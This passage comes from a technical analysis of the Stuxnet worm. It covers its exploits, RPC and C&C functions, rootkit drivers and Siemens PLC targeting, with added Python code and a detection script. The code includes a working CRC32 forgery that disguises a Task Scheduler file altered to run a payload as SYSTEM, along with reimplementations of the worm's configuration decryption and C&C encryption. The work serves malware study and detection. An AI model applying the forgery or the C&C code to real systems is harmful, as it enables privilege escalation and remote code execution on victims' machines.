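      <Command>C:\\Users\\alice\\payload.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# What the attacker changes: run as LocalSystem (S-1-5-18) with highest privileges.
MODIFIED_TASK = (ORIGINAL_TASK
    .replace(b"S-1-5-21-1004336348-1177238915-682003330-1001", b"S-1-5-18")
    .replace(b"LeastPrivilege", b"HighestAvailable"))


def task_checksum(data: bytes) -> int:
    """The check Windows performed before MS10-092: a plain CRC32 of the file."""
    return zlib.crc32(data) & 0xFFFFFFFF


def _make_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

TABLE = _make_table()
# Each table entry has a distinct top byte, which is what makes one CRC32 step invertible.
INDEX_BY_TOP = {t >> 24: i for i, t in enumerate(TABLE)}
assert len(INDEX_BY_TOP) == 256


def _register_after(data: bytes) -> int:
    # zlib.crc32 applies the final XOR; undo it to get the internal register.
    return zlib.crc32(data) ^ 0xFFFFFFFF


def _register_before(reg_after: int, trailing: bytes) -> int:
    # Walk known trailing bytes backwards: recover the register that must hold
    # just before they are processed (one table index per byte, found by top byte).
    for b in reversed(trailing):
        i = INDEX_BY_TOP[reg_after >> 24]
        reg_after = (((reg_after ^ TABLE[i]) << 8) & 0xFFFFFFFF) | (i ^ b)
    return reg_after


def _forge_bytes(reg_start: int, reg_end: int) -> bytes:
    # Four bytes suffice: after four byte steps the old register has been shifted
    # out entirely, so the end value depends only on the four table indexes used.
    idx, reg = [], reg_end
    for _ in range(4):
        i = INDEX_BY_TOP[reg >> 24]
        idx.append(i)
        reg = ((reg ^ TABLE[i]) << 8) & 0xFFFFFFFF
    idx.reverse()
    out, reg = bytearray(), reg_start
    for i in idx:
        out.append((reg ^ i) & 0xFF)          # the byte that selects index i
        reg = (reg >> 8) ^ TABLE[i]
    return bytes(out)


def forge_task_xml(original: bytes, modified: bytes, max_tries: int = 1 << 16) -> bytes:
    """Return `modified` plus a trailing XML comment so that the CRC32 of the
    result equals the CRC32 of `original`.  A nonce is varied until the four
    computed filler bytes are printable ASCII without '-' ("--" is forbidden
    inside an XML comment), so the forged file still parses."""
    target = task_checksum(original)
    tail = b" -->"
    reg_end = _register_before(target ^ 0xFFFFFFFF, tail)
    for nonce in range(max_tries):
        head = modified + b"\n<!-- " + str(nonce).encode() + b" "
        filler = _forge_bytes(_register_after(head), reg_end)
        if all(0x20 <= b < 0x7F and b != 0x2D for b in filler):
            forged = head + filler + tail
            assert task_checksum(forged) == target
            return forged
    raise RuntimeError("no printable filler found")


def is_well_formed(xml_bytes: bytes) -> bool:
    try:
        ET.fromstring(xml_bytes)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    forged = forge_task_xml(ORIGINAL_TASK, MODIFIED_TASK)
    print("original CRC32 : %08x" % task_checksum(ORIGINAL_TASK))
    print("forged   CRC32 : %08x" % task_checksum(forged))
    print("well-formed    :", is_well_formed(forged))
    print(forged[-60:].decode("ascii"))
```

The point of the example is the last step: because CRC32 is linear, any change to the file can be cancelled by four chosen bytes placed anywhere the format tolerates free text, so the checksum detects accidental corruption only. A keyed MAC, or the SHA-256 that MS10-092 introduced together with protected storage of the reference value, is what an integrity check of attacker-writable data needs.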
Functioning of the malware

The malware can be decomposed into several files. The main module, which takes the form of a DLL, is packed with UPX. This module is executed at the start of any attempt at compromise, whatever the vector (USB drive, network or SQL). As has previously been explained, the malware uses four zero-day Windows vulnerabilities to spread via different vectors (USB and local network). All of these techniques are used to install it on a system. In the most widespread case of infection, by opening a directory present on a USB drive, the exploitation of the LNK vulnerability launches execution of the main module.

Functionalities provided

Among other things, execution of this module launches a rootkit to hide the malicious files present on the USB drive. For this, certain system functions of the shared libraries "ntdll.dll" and "kernel32.dll" are hooked so that code can be injected, and so that the presence of the malicious files is hidden based on specific criteria (".lnk" files with a size of 1,471 bytes, and "~WTRabcd.tmp" files for which the sum of the digits a, b, c and d modulo 10 is equal to 0).

The malware is capable of injecting executable code into running processes, or into a newly created process whose name corresponds to that of an antivirus program. These operations mean that it is not necessary to load from disk a file that would risk being detected by an antivirus program.

Several other functionalities useful to the malware's proliferation have been added by its designers. Among these are functionalities allowing it to spread, hide itself and lastly update itself. These correspond, overall, to the 21 functions exported by Stuxnet's main module:

- Function 1: infect removable media and launch the RPC server;
- Function 2: hook certain functions in order to infect the .S7P and .MCP files corresponding to Step7 projects;
- Function 4: initiate the Stuxnet uninstallation procedure;
- Function 5: check that the kernel driver MrxCls.sys is correctly installed;
- Functions 6 and 7: return the version of Stuxnet installed;
- Functions 9, 10 and 31 (13?): update the malware from Step7 files;
- Function 14: infect Step7 files;
- Function 15: point of entry for the system-infection routine;
- Function 16: infect the system (installation of drivers, DLLs, resources, code injection, etc.);
- Function 17: replace a Step7 DLL so as to be able to intercept the calls to certain functions;
- Function 18: complete uninstallation of the malware;
- Function 19: infect a USB drive;
- Function 22: infect remote systems via the local network;
- Function 24: check the Internet connection;
- Function 27: RPC server;
- Function 28: dialogue with the command and control (C&C) server;
- Function 29: dialogue with the C&C server and execute the code returned;
- Function 32: RPC server used by the service server to respond to certain RPC calls.

Several network functionalities are implemented within the malware. Among these are the RPC client and server. P2P communications and the use of a C&C are mainly used to keep the malware up to date and to recover information. Nevertheless, these could be used to download and install other malware, or to exfiltrate sensitive information stolen from the compromised system.
Installation of an RPC server

The RPC server is subdivided into two components for handling local and remote RPC calls. For this, Stuxnet infects different processes according to the type of RPC call to be handled: "services.exe" for local calls, or one of the processes "netsvc", "rpcss" or "browser" for remote RPC calls. The various RPC methods are as follows:

- Method 1: returns the version of Stuxnet;
- Method 2: loads the module passed as a parameter in a new process and executes the specified exported function;
- Method 3: loads the module passed as a parameter into the memory space of the current process and calls its first exported function;
- Method 4: loads the module passed as a parameter into a new process and executes it;
- Method 5: creates a "dropper" and sends it to a compromised system;
- Method 6: executes the specified application;
- Method 7: reads the data from the specified file;
- Method 8: writes the data into the specified file;
- Method 9: deletes a file;
- Method 10: performs various tasks from the names of files intercepted using the "hooks" installed by Method 2, and writes the information into a log file.

It appears that the last three methods implemented are not used by Stuxnet.

Thanks to this RPC mechanism, which can be used within the context of P2P communications, Stuxnet is, among other things, able to update itself on a local network from another compromised system.

C&C communications

The second functionality related to the network is a module for communicating with one of the command and control (C&C) servers. Like the "P2P over RPC" function, the module allows a compromised system to load malicious code into memory and execute it.

The list of command and control servers is specified in the configuration file "%WINDIR%\inf\mdmcpq3.pnf". This file of 1,860 bytes may be decrypted with the following function:

    # Decryption routine of the configuration file (Python).
    # "key" and "counter" are the two inputs of the keystream generator and
    # "sym" is the encrypted byte; the function returns the plaintext byte.
    # Only the low 16 bits of the intermediate products matter (v2 is masked),
    # so Python's unbounded integers give the same result as 32-bit arithmetic.
    def decrypt(key, counter, sym):
        v0 = key * counter
        v1 = v0 >> 0xb
        v1 = (v1 ^ v0) * 0x4e35
        v2 = v1 & 0xffff
        v3 = v2 * v2
        v4 = v3 >> 0xd
        v5 = v3 >> 0x17
        xorbyte = ((v5 & 0xff) + (v4 & 0xff)) & 0xff
        xorbyte = xorbyte ^ ((v2 >> 8) & 0xff)
        xorbyte = xorbyte ^ (v2 & 0xff)
        return xorbyte ^ sym

This file contains several items of information, such as the list of servers used to check the Internet connection, the list of C&C servers, the dates and times of activation and deactivation of the worm (after which the worm deactivates itself using the previously-mentioned functions), the version of the malware, the minimum number of files that a USB drive must contain for it to be infected using malicious LNK files, and lastly other ancillary information used for the correct functioning of the worm and its propagation.

Concerning the functioning mode of the C&C servers, an instance of Stuxnet does not exchange plaintext messages with the two previously-mentioned servers. Each of the messages sent over the Internet to the servers is encrypted using a very simple algorithm: a simple XOR with the following 31-byte key:

    // Encryption key
    char Key[31] = {
        0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6,
        0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57,
        0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A,
        0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1
    };

    // Encryption procedure: XOR each byte of the buffer with the key,
    // which is repeated every 31 bytes
    void EncryptData(char *Buffer, int BufferSize, char *Key)
    {
        for (int i = 0; i < BufferSize; i++)
            Buffer[i] ^= Key[i % 31];
        return;
    }
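An added example, written for this article and not Stuxnet's own code nor a translation of the C routine above: the same 31-byte XOR in Python, applied on both sides of the exchange (infected host and C&C server), together with the length check that the text goes on to describe for the server's reply (a 4-byte size, a 1-byte flag, then the executable image, accepted only if the total length is the announced size plus 5). It also shows why a fixed repeating XOR key is no protection at all: 31 bytes of known plaintext give back the whole key. The beacon content and the little-endian size field are assumptions of the example; the key is the one from the listing above.

```python
import struct

# The 31-byte XOR key from the listing above.
CC_KEY = bytes([
    0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2, 0x72,
    0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A,
    0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1,
])


def xor_cc(buf: bytes) -> bytes:
    """Python equivalent of EncryptData(): XOR with the key repeated every
    31 bytes.  XOR is its own inverse, so the same call also decrypts."""
    return bytes(b ^ CC_KEY[i % len(CC_KEY)] for i, b in enumerate(buf))


# Constructed beacon plaintext for the walk-through.  The real message carries
# interface, OS and malware version data in a layout that is not reproduced here.
SAMPLE_BEACON = (b"\x01\x00" + b"WIN-XP-SP3\x00"
                 + b"00:11:22:33:44:55\x00" + b"\x01\x00\x00\x00")


def client_send(plain: bytes) -> bytes:
    """Infected host side: the bytes carried by the data= parameter of the GET."""
    return xor_cc(plain)


def server_receive(wire: bytes) -> bytes:
    """C&C side: recover the beacon."""
    return xor_cc(wire)


def build_cc_response(flag: int, image: bytes) -> bytes:
    """C&C side: size (4 bytes, little-endian assumed), flag (1 byte), image."""
    return struct.pack("<IB", len(image), flag) + image


def parse_cc_response(raw: bytes):
    """Infected host side: accept the reply only if its length equals the
    announced image size plus the 5 header bytes, otherwise ignore it.
    Returns (flag, image) or None."""
    if len(raw) < 5:
        return None
    size, flag = struct.unpack_from("<IB", raw, 0)
    if len(raw) != size + 5:
        return None
    return flag, raw[5:]


def recover_key(wire: bytes, known_plain: bytes) -> bytes:
    """Known-plaintext attack on the repeating XOR: 31 bytes of known plaintext
    reveal the whole key, which is how such keys end up in public analyses."""
    if len(known_plain) < len(CC_KEY) or len(wire) < len(CC_KEY):
        raise ValueError("need at least 31 bytes of known plaintext")
    return bytes(w ^ p for w, p in zip(wire[:31], known_plain[:31]))


if __name__ == "__main__":
    wire = client_send(SAMPLE_BEACON)
    print("on the wire   :", wire.hex())
    print("at the server :", server_receive(wire))
    reply = build_cc_response(1, b"MZ\x90\x00" + bytes(12))
    print("valid reply   :", parse_cc_response(reply))
    print("truncated     :", parse_cc_response(reply[:-1]))
    print("key recovered :", recover_key(wire, SAMPLE_BEACON) == CC_KEY)
```

For detection, the same function applied to a captured data= parameter turns it back into the plaintext beacon, and a run of 31 zero bytes in the plaintext (padding is common in such structures) shows the key verbatim on the wire.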
The structure of a message sent by the malware is quite complex. It contains much information specific to the victim, including information related to the network interfaces and the versions of the OS and of the malware. This message is simply sent to the server in an HTTP GET request to one of the URLs listed in the configuration file. For example: http://... data=STUXNET_CC_MESSAGE.

In response to this request, the server returns a message composed of several items: a size coded over 4 bytes, a flag coded over 1 byte and lastly an executable image. If the size of the received message does not correspond to the indicated size of the image plus 5 bytes, the malware ignores the response. If the size corresponds, then according to the value of the flag, the malware loads the executable image into the memory space of the current process or into another process, using one of the dedicated RPC methods, and executes it.

It nevertheless appears that this important functionality has not really been used, neither to update the software nor to install additional malicious tools. It nevertheless constitutes a backdoor. The rapid blocking of the C&C domains, www.mypremierfutbol.com among them, has perhaps had a role in this.

Seeking and infecting the WinCC environment

Lastly, to maximize the efficiency of the proliferation operation, the malware searches for the WinCC software. When it is discovered, Stuxnet connects to the database used by the software, using a hard-coded default password. Once connected to this database, the malware sends the malicious code via SQL requests, then executes it.

This first action compromises the MSSQL server. Then, the malware modifies the SQL views defined on the server to force the execution of code each time these views are accessed.

Stuxnet is also capable of infecting the WinCC / Step7 projects managed with WinCC Simatic Manager. The files that are sought and modified have the extensions .S7P, .MCP or .TMP. Under certain specific conditions, files with the names "xutils\listen\xr000000.mdx", "xutils\links\s7p00001.dbf" and "xutils\listen\s7000001.mdx", or "GracS\cc_alg.sav", "GracS\db_log.sav" and "GracS\cc_tag.sav", are deposited. In both cases, these files correspond respectively to an encrypted version of the malware's main DLL, to a data file of 90 bytes and lastly to an encrypted version of Stuxnet's block of configuration data. Lastly, a specially-designed DLL is placed in the multiple sub-directories of the directory "hOmSave7".

The infection mechanism is relatively simple. When the project is opened using WinCC Simatic Manager, the DLL placed in the sub-directories of "hOmSave7" is automatically looked up and loaded. Once loaded, the library decrypts the protected data and loads the malware's main component into memory to complete the infection.

Persistence

To ensure the persistence of the functionalities previously installed, Stuxnet nevertheless has to profoundly modify the system. This is because it is not possible to inject code into arbitrary processes, or to durably hide files from user mode, without deep modifications to the system. Two system drivers, signed with private keys corresponding to certificates belonging to Realtek and JMicron, are therefore installed using the elevated privileges obtained from the two exploits (Keyboard Layout and Task Scheduler). "MrxCls.sys" is used to inject code into processes. "MrxNet.sys" is a rootkit for hiding the malicious files used to exploit the LNK vulnerability. In contrast to the user-mode rootkit, this one is persistent.

The fact that these drivers are signed with stolen certificates means that they can be installed more discreetly, so as not to arouse the user's suspicions (a valid signature is mandatory for loading kernel drivers on 64-bit Windows Vista and 7, and avoids a warning on the 32-bit editions). The ".lnk" files with a size of 1,471 bytes and the "~WTRabcd.tmp" files for which the sum of a, b, c and d modulo 10 is equal to 0 are filtered so that they are not displayed by the file explorer. This filter is active only for the NTFS, FAT and CDFS file systems. After registering itself with the function "IoRegisterFsRegistrationChange()", the driver is called each time a file system is mounted and can therefore intercept the requests that are sent to it. Thus, the driver can choose with complete impunity which files to show in a directory listing, to the file explorer and to any other process alike.
Attack scenario

1: The attacker manages to infect a USB drive used by a person working on a computer connected to the target information system.
2: The person uses their USB drive within the target information system's LAN.
3: After having infected a Windows workstation, Stuxnet seeks to spread across the LAN.
4: Stuxnet contacts its C&C server.
5: An employee whose USB drive has been contaminated connects it to a workstation equipped with the WinCC software and belonging to an industrial network.
6: When this contaminated workstation connects to a PLC, Stuxnet deposits the malicious code corresponding to the PLC.
7: The malicious code sends specific orders to the variable frequency drives.
7 bis: The person responsible for supervising the equipment cannot identify the presence of Stuxnet.
The resources embedded by Stuxnet

The two previously-mentioned drivers correspond respectively to resources 201 and 242 of the main module. Eleven other resources are also available, such as an executable PE module (210), a LNK file (240), and a block of configuration data for the driver "MrxCls.sys" (205):

- Resource 201: driver "MrxCls.sys", signed with certificates belonging to Realtek or JMicron;
- Resource 202: DLL used in compromising Step7 projects;
- Resource 203: CAB file containing an equivalent of resource 202, used for compromising WinCC projects;
- Resource 205: encrypted configuration-data file for the driver "MrxCls.sys";
- Resource 208: shared library "s7otbxdx.dll" usurping the functions of the original Siemens DLL;
- Resource 209: file of 25 bytes containing encrypted data, deposited in "%WINDIR%\help\winmic.fts";
- Resource 210: PE file template used for creating or injecting executables ("~WTR4132.TMP");
- Resource 221: malicious code used for exploiting the vulnerability present in the server service (MS08-067);
- Resource 222: malicious code used for exploiting the vulnerability present in the print spooler (MS10-061);
- Resource 240: LNK file template;
- Resource 241: "~WTR4141.TMP", DLL used for loading the executable "~WTR4132.TMP" (built from resource 210), which is responsible for installing the malware (dropper);
- Resource 242: driver "MrxNet.sys" (rootkit) used to mask the presence of certain files;
- Resource 250: malicious code used to exploit the vulnerability present in the handling of the keyboard layout (MS10-073).

The following resources were observed by Symantec in older versions of Stuxnet, but have disappeared in the latest versions:

- Resource 207: information related to the exploitation of a vulnerability using Autorun.inf;
- Resource 231: resource used to check whether the system is connected to the Internet.

INFO: Definitions

PLC: Programmable Logic Controller. A programmable controller is a programmable electronic device for controlling industrial processes by sequential processing. It sends orders to the pre-actuators (operative section, on the actuator side) from input data (sensors, on the control section side), instructions and a computer program.

SCADA: Supervisory Control And Data Acquisition (remote monitoring and data acquisition). Large-scale remote-control system for the real-time processing of a large number of remote measurements and for remotely controlling technical facilities. It is an industrial technology in the field of instrumentation.
Phase III: attack on industrial systems

Detection of SCADA systems based on WinCC

Once the Windows system has been compromised and the malware installed, the third phase of the attack can begin. This corresponds to the search for certain specific software. To access the SCADA system, the authors of the malware have chosen to go via the development tools associated with the target system: Step7 and WinCC. These two tools are respectively used to develop the programs running on PLCs and to check their correct functioning. Incidentally, these tools are potentially the only point of entry to these sensitive systems, given that they are not supposed to be connected to the Internet, but rather to a network dedicated to them.

To carry out this third phase of the attack, the malware searches for and replaces the shared library "s7otbxdx.dll". This library, which comes from the Simatic software suite from Siemens, is used to have a PC running Windows communicate with a PLC of the Simatic family. Usually, a developer programs the equipment in one of the programming languages supported by the suite, such as STL or SCL. This is subsequently compiled into a specific bytecode called "MC7", before being loaded onto the PLC.

By renaming the shared library "s7otbxdx.dll" to "s7otbxsx.dll", then putting its own version of "s7otbxdx.dll" in its place, the malware is able to intercept all calls to the functions exported by the original library and to manipulate them at will. In fact, only the behavior of a few functions is affected. Most of the calls to the functions of "s7otbxdx.dll" are forwarded directly to the equivalent functions in "s7otbxsx.dll".

The 16 functions whose behavior is altered include the methods for reading ("s7blk_read"), writing ("s7blk_write"), enumerating ("s7blk_findfirst" and "s7blk_findnext") and deleting ("s7blk_delete") the blocks of code present on the PLC. It is by modifying these key functions of the library that the attackers ensure the durability and discretion of their attack. To avoid detection when an operator connects to a compromised PLC, the "read" and "enumeration" functions hide certain blocks of code from the operator and only return the original "healthy" code.

But not all PLCs are targeted. Stuxnet, using two threads launched by the malicious library, searches for precisely two types of device with the references Siemens 6ES7-315-2 and 6ES7-417. The main difference between these two models of controller is the quantity of embedded memory: 256 KB for the S7-315 series against 30 MB for the S7-417 series.

Module 315

Secondly, in the configuration targeted by the malware, the PLCs of the 300 series (6ES7-315-2) must use between one and six Profibus CP 342-5 modules to communicate with the systems under their control. Once again, only certain identification numbers are sought. In the case of Stuxnet, these are the Profibus identification numbers 7050h and 9500h. These numbers uniquely identify the models of equipment known as "frequency converter drives" or "variable frequency drives". The corresponding products are the "KFC750V3" manufactured by Fararo Paya, based in Tehran in Iran, and the "Vacon NX" from Vacon, based in Finland.
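Two of the traces described in this article give a defender concrete things to look for on disk: the two hiding rules of MrxNet.sys from the Persistence section (".lnk" files of exactly 1,471 bytes, and "~WTRabcd.tmp" files whose digits sum to 0 modulo 10) and, from the section above, the renamed original "s7otbxsx.dll" sitting next to the replacement "s7otbxdx.dll". The script below is an added example written for this article, not part of the original text nor of any vendor's removal tool. It applies those rules to a directory tree, and builds a constructed sample layout (made-up paths and sizes) so that it can be run offline.

```python
import os
import re
import tempfile

WTR_RE = re.compile(r"^~wtr(\d{4})\.tmp$", re.IGNORECASE)


def is_hidden_by_mrxnet(name: str, size: int) -> bool:
    """The two rules MrxNet.sys applies when filtering directory listings:
    .lnk files of exactly 1,471 bytes, and ~WTRabcd.tmp files whose four
    digits sum to 0 modulo 10 (4141 and 4132 both sum to 10)."""
    if name.lower().endswith(".lnk"):
        return size == 1471
    m = WTR_RE.match(name)
    if m:
        return sum(int(d) for d in m.group(1)) % 10 == 0
    return False


def scan_tree(root: str):
    """Walk a directory tree (a mounted USB drive, a Step7 installation) and
    return a sorted list of (relative path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lower_names = {f.lower() for f in files}
        for f in files:
            path = os.path.join(dirpath, f)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if is_hidden_by_mrxnet(f, os.path.getsize(path)):
                findings.append((rel, "matches an MrxNet.sys hiding rule"))
            # The original Step7 DLL renamed by Stuxnet, next to its replacement.
            if f.lower() == "s7otbxsx.dll" and "s7otbxdx.dll" in lower_names:
                findings.append((rel, "s7otbxdx.dll replaced, original renamed"))
    return sorted(findings)


def build_sample_tree() -> str:
    """Constructed sample layout for an offline run (not data from a real infection)."""
    root = tempfile.mkdtemp(prefix="stuxnet_ioc_")

    def put(rel, size):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"\0" * size)

    put("usb/Copy of Shortcut to.lnk", 1471)            # hidden: 1,471-byte .lnk
    put("usb/Copy of Copy of Shortcut to.lnk", 1471)    # hidden: 1,471-byte .lnk
    put("usb/report.lnk", 1024)                         # ordinary shortcut, shown
    put("usb/~WTR4141.TMP", 500)                        # 4+1+4+1 = 10 -> hidden
    put("usb/~WTR4132.TMP", 500)                        # 4+1+3+2 = 10 -> hidden
    put("usb/~WTR1235.TMP", 500)                        # 1+2+3+5 = 11 -> shown
    put("Step7/S7BIN/s7otbxdx.dll", 4096)               # Stuxnet's replacement
    put("Step7/S7BIN/s7otbxsx.dll", 4096)               # renamed original
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, reason in scan_tree(root):
        print(f"{rel:40s} {reason}")
```

Run it from a clean system, or against the drive mounted on another machine: on an infected host MrxNet.sys filters the directory queries of every process, so a scan run locally would see none of the hidden files.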